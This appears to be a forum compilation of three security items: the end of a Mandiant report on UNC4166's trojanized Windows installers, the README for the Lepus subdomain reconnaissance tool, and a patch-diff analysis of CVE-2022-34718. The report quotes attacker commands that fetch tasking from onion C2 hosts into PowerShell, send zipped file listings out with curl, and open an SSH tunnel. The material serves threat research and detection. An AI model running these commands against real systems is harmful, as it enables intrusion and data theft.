UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these devices. 
Based on our analysis, the subsequent tasking fall into three categories: Deployment of tools to enable exfiltration of data (like TOR and Sheret) Deployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART) Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY) TOR Browser Downloaded In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim’s device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torprojects.org website. It’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR or may be used by additional capability as a route for exfiltration. We also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device. bundle.zip (MD5: 66da9976c96803996fc5465decf87630) Legitimate TOR Installer bundle Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip Downloaded from https:// 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip Use of Sheret HTTP Server and localhost[.]run In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a tunnel from the local device to the service localhost[.]run. In at least one instance, this web server was used for serving files on a removable drive connected to the victim device and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism. The command used for SSH tunnelling was: ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo This command configures the local system to create a tunnel from the local device to the website localhost.run. C:\Windows\System32\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d) Sheret web server Publicly available as a build from https://github.com/ethanpil/sheret Compiled date: 1970/01/01 00:00:00 Deployment of SPAREPART, Likely as a Redundant Backdoor We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command. Functionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute via piping the commands into the PowerShell process. SPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is nearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID) for use in communications with the C2 server. 
Figure 4: SPAREPART formatting of header The payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument which will mean that the payload is unable to execute commands provided by the threat actor. Figure 5: SPAREPART parsing threat actor input SPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing timing. The randomisation is seeded of the base address of the image in memory, this value is then used to determine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours. If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed. Figure 6: SPAREPART randomizing the time for next beacon After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload attempts to perform a GET request using the previously formatted headers, providing the response is a valid status (200), the data will be read and written to a previously created pipe. Figure 7: SPAREPART downloading payload If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor. Figure 8: SPAREPART executing a command Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original schedule tasks. MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8) SPAREPART backdoor Compiled on: 2022/11/28 02:32:33 PDB path: C:\Users\user\Desktop\ImageAgent\ImageAgent\PreAgent\src\builder\agent.pdb Deployment of Additional Backdoors In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a schedule task named AzureSync on at least one device. The schedule task was configured to execute AzureSync via rundll32.exe. AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on the June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022. 
C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) BEACON backdoor Original name: tr2fe.dll Compiled on: 1970/01/01 00:00:00 Dropped by 529388109f4d69ce5314423242947c31 (BEACON) Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim device. C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 193.142.30.166:443 %LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 91.205.230.66:8443 Indicators Scheduled Tasks C:\Windows\System32\Tasks\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d) Schedule task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell Trojanized Scheduled Tasks C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) BEACON Backdoor C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) Scheduled Tasks for Persistence C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSync C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSyncDaily STOWAWAY Backdoor C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) %LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) Services for Persistence Printer driver host for applications SODUsvc On Host Recon Commands Get-ChildItem -Recurse -Force -Path ((C:)+’') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force; Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8 invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8 Get-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} | ForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo.zip’ -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo Trojanized Windows Image Network Indicators Indicators of Compromise Signature 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe Malicious Windows 
Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws Malicious Windows Image Tor C2 BEACON C2s https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– https://cdnworld[.]org/34702–general/sync/42823419-cdn STOWAWAY C2s 193.142.30[.]166:443 91.205.230[.]66:8443 Appendix MITRE ATT&CK Framework ATT&CK Tactic Category Techniques Initial Access T1195.002: Compromise Software Supply Chain Persistence T1136: Create Account T1543.003: Windows Service Discovery T1049: System Network Connections Discovery Execution T1047: Windows Management Instrumentation T1059: Command and Scripting Interpreter T1059.001: PowerShell T1059.005: Visual Basic T1569.002: Service Execution Defense Evasion T1027: Obfuscated Files or Information T1055: Process Injection T1140: Deobfuscate/Decode Files or Information T1218.011: Rundll32 T1562.004: Disable or Modify System Firewall T1574.011: Services Registry Permissions Weakness Command and Control T1071.004: DNS T1090.003: Multi-hop Proxy T1095: Non-Application Layer Protocol T1573.002: Asymmetric Cryptography Resource Development T1587.002: Code Signing Certificates T1588.004: Digital Certificates T1608.003: Install Digital Certificate Detection Rules rule M_Backdoor_SPAREPART_SleepGenerator { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the algorithm used to determine the next sleep timer" version = "1" weight = "100" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $ = {C1 E8 06 89 [5] C1 E8 02 8B} $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01} $ = {8B 80 FC 00 00 00} $ = {D1 E8 [4] c1 E1 0f 0b c1} condition: all of them } rule M_Backdoor_SPAREPART_Struct { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the PDB and a struct used in SPAREPART" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ?? } condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pdb and $struct and filesize < 20KB } Sursa: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
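    Note: as a rough starting point for hunting the trojanized scheduled tasks described above, the Python sketch below (my own, untested in production, assuming sufficient rights to read the task store) walks C:\Windows\System32\Tasks and flags task definitions whose actions pull tasking from a Tor gateway via curl.exe or pipe curl output into PowerShell.

    import os
    import re

    TASK_DIR = r"C:\Windows\System32\Tasks"

    # Pattern based on the IOCs above: curl.exe fetching from an onion.moe/onion.ws
    # gateway, or curl output piped into powershell.exe.
    SUSPICIOUS = re.compile(
        r"curl\.exe.+onion\.(moe|ws)|curl\.exe.+\|\s*powershell",
        re.IGNORECASE | re.DOTALL,
    )

    for root, _dirs, files in os.walk(TASK_DIR):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read()
            except OSError:
                continue
            # Task definition files are XML, usually UTF-16 with a BOM.
            if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
                text = raw.decode("utf-16", errors="ignore")
            else:
                text = raw.decode("utf-8", errors="ignore")
            if SUSPICIOUS.search(text):
                print("[!] suspicious task action:", path)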
  10. Lepus Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast! Basic Usage lepus.py yahoo.com Summary Enumeration modes Subdomain Takeover Port Scan Installation Arguments Full command example Enumeration modes The enumeration modes are different ways lepus uses to identify sudomains for a given domain. These modes are: Collectors Dictionary Permutations Reverse DNS Markov Moreover: For all methods, lepus checks if the given domain or any generated potential subdomain is a wildcard domain or not. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP Addresses. Collectors The Collectors mode collects subdomains from the following services: Service API Required AlienVault OTX No Anubis-DB No Bevigil Yes BinaryEdge Yes BufferOver Yes C99 Yes Censys Yes CertSpotter No CommonCrawl No CRT No DNSDumpster No DNSRepo Yes DNSTrails Yes Farsight DNSDB Yes FOFA Yes Fullhunt Yes HackerTarget No HunterIO Yes IntelX Yes LeakIX Yes Maltiverse No Netlas Yes PassiveTotal Yes Project Discovery Chaos Yes RapidDNS No ReconCloud No Riddler Yes Robtex Yes SecurityTrails Yes Shodan Yes SiteDossier No ThreatBook Yes ThreatCrowd No ThreatMiner No URLScan Yes VirusTotal Yes Wayback Machine No Webscout No WhoisXMLAPI Yes ZoomEye Yes You can add your API keys in the config.ini file. The Collectors module will run by default on lepus. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument. Dictionary The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus located at lists/subdomains.txt. An example run would be: lepus.py -w lists/subdomains.txt yahoo.com Permutations The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name.An example run would be: lepus.py --permutate yahoo.com or lepus.py --permutate -pw customsubdomains.txt yahoo.com ReverseDNS The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2,internal or oldsite. To run the ReverseDNS module use the --reverse argument. Additionally, --ripe (or -ripe) can be used in order to instruct the module to query the RIPE database using the second level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. 
An example run would be:

lepus.py --reverse yahoo.com

or

lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com

or, to run only against the defined ranges and/or the ones identified from RIPE:

lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com

Hint: Lepus will identify ASNs and networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run.

Markov

With this module, Lepus will utilize Markov chains in order to train itself and then generate subdomains based on the already known ones. The bigger the general surface, the better the tool will be able to train itself and, subsequently, the better the results will be. The module can be activated with the --markovify argument.

Parameters also include the Markov state size, the maximum length of the generated candidate addition, and the quantity of generated candidates. The predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively.

lepus.py --markovify yahoo.com

or

lepus.py --markovify -ms 5 -ml 10 -mq 10

Subdomain Takeover

Lepus has a list of signatures in order to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services:

Acquia, Activecampaign, Aftership, Aha!, Airee, Amazon AWS/S3, Apigee, Azure, Bigcartel, Bitbucket, Brightcove, Campaign Monitor, Cargo Collective, Desk, Feedpress, Fly.io, Getresponse, Ghost.io, Github, Hatena, Helpjuice, Helpscout, Heroku, Instapage, Intercom, JetBrains, Kajabi, Kayako, Launchrock, Mashery, Maxcdn, Moosend, Ning, Pantheon, Pingdom, Readme.io, Simplebooklet, Smugmug, Statuspage, Strikingly, Surge.sh, Surveygizmo, Tave, Teamwork, Thinkific, Tictail, Tilda, Tumblr, Uptime Robot, UserVoice, Vend, Webflow, Wishpond, Wordpress, Zendesk

Port Scan

The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument, which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports:

small: 80, 443
medium (default): 80, 443, 8000, 8080, 8443
large: 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443
huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017

An example run would be:

lepus.py --portscan yahoo.com

or

lepus.py --portscan -p huge yahoo.com

or

lepus.py --portscan -p 80,443,8082,65123 yahoo.com

Installation

Normal installation:

$ python3.7 -m pip install -r requirements.txt

Preferably install in a virtualenv:

$ pyenv virtualenv 3.7.4 lepus
$ pyenv activate lepus
$ pip install -r requirements.txt

Installing the latest Python on Debian:

$ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget
$ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz
$ tar -xf Python-3.7.4.tar.xz
$ cd Python-3.7.4
$ ./configure --enable-optimizations --enable-loadable-sqlite-extensions
$ make
$ make altinstall

Arguments

usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt] [--permutate]
                [-pw PERMUTATION_WORDLIST] [--reverse] [-r RANGES] [--portscan]
                [-p PORTS] [--takeover] [--markovify] [-ms MARKOV_STATE]
                [-ml MARKOV_LENGTH] [-mq MARKOV_QUANTITY] [-f] [-v]
                domain

Infrastructure OSINT

positional arguments:
  domain                domain to search

optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        wordlist with subdomains
  -hw, --hide-wildcards
                        hide wildcard resolutions
  -t THREADS, --threads THREADS
                        number of threads [default is 100]
  -nc, --no-collectors  skip passive subdomain enumeration
  -zt, --zone-transfer  attempt to zone transfer from identified name servers
  --permutate           perform permutations on resolved domains
  -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST
                        wordlist to perform permutations with [default is lists/words.txt]
  --reverse             perform reverse dns lookups on resolved public IP addresses
  -ripe, --ripe         query ripe database with the 2nd level domain for networks to be used for reverse lookups
  -r RANGES, --ranges RANGES
                        comma seperated ip ranges to perform reverse dns lookups on
  -or, --only-ranges    use only ranges provided with -r or -ripe and not all previously identifed IPs
  --portscan            scan resolved public IP addresses for open ports
  -p PORTS, --ports PORTS
                        set of ports to be used by the portscan module [default is medium]
  --takeover            check identified hosts for potential subdomain take-overs
  --markovify           use markov chains to identify more subdomains
  -ms MARKOV_STATE, --markov-state MARKOV_STATE
                        markov state size [default is 3]
  -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH
                        max length of markov substitutions [default is 5]
  -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY
                        max quantity of markov results per candidate length [default is 5]
  -f, --flush           purge all records of the specified domain from the database
  -v, --version         show program's version number and exit

Full command example

The following is an example run with all available active arguments:

./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10

The following command flushes all database entries for a specific domain:

./lepus.py python.org --flush

Sursa: https://github.com/GKNSB/Lepus
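To make the Markov module's idea more concrete, here is a minimal, self-contained Python sketch. It is an illustration only, not Lepus's actual implementation: it trains a character-level Markov chain on already-known subdomain labels and generates new candidates, with the state size and candidate count loosely mirroring the -ms and -mq parameters.

# Minimal character-level Markov chain for subdomain candidate generation.
# Illustrative sketch only -- not the actual Lepus implementation.
import random
from collections import defaultdict

known = ["mail", "mail2", "webmail", "dev", "devapi", "api", "api-test", "static1"]

STATE = 3      # analogous to -ms / --markov-state
MAX_LEN = 12   # maximum candidate length
COUNT = 5      # analogous to -mq / --markov-quantity

# Build a transition table: last STATE chars -> possible next chars ("$" = end).
transitions = defaultdict(list)
for label in known:
    padded = "^" * STATE + label + "$"
    for i in range(len(padded) - STATE):
        transitions[padded[i:i + STATE]].append(padded[i + STATE])

def generate():
    state, out = "^" * STATE, ""
    while len(out) < MAX_LEN:
        choices = transitions.get(state)
        if not choices:
            break
        nxt = random.choice(choices)
        if nxt == "$":
            break
        out += nxt
        state = state[1:] + nxt
    return out

candidates = {generate() for _ in range(COUNT * 10)}
print(sorted(c for c in candidates if c and c not in known))

In practice the generated labels would simply be appended to the candidate list and resolved like any other wordlist entries.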
  11. Dissecting and Exploiting TCP/IP RCE Vulnerability "EvilESP"

Software Vulnerabilities | January 20, 2023 | By Valentina Palmiotti | 10 min read

September's Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: "An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine."

Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft's advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis on and craft a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter, a blog post and PoC were published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog.

In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I'll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I'll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE).

Patch Diffing

Microsoft's advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we'll compare the patched binary to the pre-patch binary and try to extract the "diff"(erence) using a tool called BinDiff.

I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10.

I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (ticking the aggressive instruction finder option works best). Afterward, the files can be exported into BinExport format using the BinExport extension for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences:

[Image: BinDiff summary comparing the pre- and post-patch binaries]

BinDiff works by matching functions in the binaries being compared using various algorithms. In this case, we have applied function symbol information from Microsoft, so all the functions can be matched by name.

[Image: List of matched functions sorted by similarity]

Above we see there are only two functions that have a similarity of less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram.

Vulnerability Root Cause Analysis

Previous research shows that the Ipv6pReassembleDatagram function handles reassembling IPv6 fragmented packets.
The function name IppReceiveEsp seems to indicate that this function handles the receiving of IPsec ESP packets. Before diving into the patch, I'll briefly cover IPv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch.

IPv6 Fragmentation:

An IPv6 packet can be divided into fragments, with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation:

[Image: Illustration of IPv6 fragmentation]

According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format:

[Image: IPv6 Fragment Header format]

where the Next Header field is the type of header present in the fragmented data.

IPsec (ESP):

IPsec is a group of protocols that are used together to set up encrypted connections. It's often used to set up Virtual Private Networks (VPNs). From the first part of the patch analysis, we know the bug is related to the processing of ESP packets, so we'll focus on the Encapsulating Security Payload (ESP) protocol.

As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of the IP header is contained in the encrypted payload; in transport mode, only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows:

[Image: Top Level Format of an ESP Packet]

The Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data.

Now, with a primer on IPv6 fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched.

Ipv6pReassembleDatagram

Comparing the function graphs side by side, we can see that a single new code block has been introduced into the patched function:

[Image: Side-by-side comparison of the pre- and post-patch function graphs of Ipv6pReassembleDatagram]

Let's take a closer look at the block:

[Image: New code block in the patched function]

The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let's take a look at that destination block:

The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and that a "goto error" line has been inserted into the code for when the check fails.

With this bit of insight, we can perform static analysis in a decompiler. 0vercl0ck previously published a blog post doing vulnerability analysis on a different IPv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments.

[Image: Decompilation output of Ipv6pReassembleDatagram]

In the above code snippet, the pink box surrounds the new code added by the patch.
Reassembly->nextheader_offset contains the byte offset of the next_header field in the IPv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer, and on line 35, Reassembly->nextheader_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We'll move on to the second patched function to seek more answers.

IppReceiveEsp

Looking at the function graphs side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function:

[Image: Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp]

The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch.

[Image: Decompilation output of IppReceiveEsp]

Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as a fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for IPv6, and Fragment Header for IPv6, respectively.

Referring back to the ESP RFC, it states: "In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers." Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded.

Putting It All Together

Now that we have diagnosed the patches in the two different functions, we can figure out how they are related. In the first function, Ipv6pReassembleDatagram, we determined the fix was for a buffer overflow.

[Image: Decompilation output of Ipv6pReassembleDatagram]

Recall that the size of the victim buffer is calculated as the size of the extension headers plus the size of an IPv6 header (line 10 above). Now refer back to the patch that was inserted (line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value in the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet:

[Image: Top Level Format of an ESP Packet]

Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or IPv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet.

[Image: Illustrated root cause of CVE-2022-34718]

Now refer back to line 35 of Ipv6pReassembleDatagram: this is where an out-of-bounds 1-byte write occurs (the size and value of NextHeader).

Reproducing the Bug

We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets?
To answer this question, I first tried to send packets containing an ESP header with junk data to a victim, and put a breakpoint on the vulnerable IppReceiveEsp function to see if it could be reached. The breakpoint was hit, but the internal function that I thought did the decrypting, IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established.

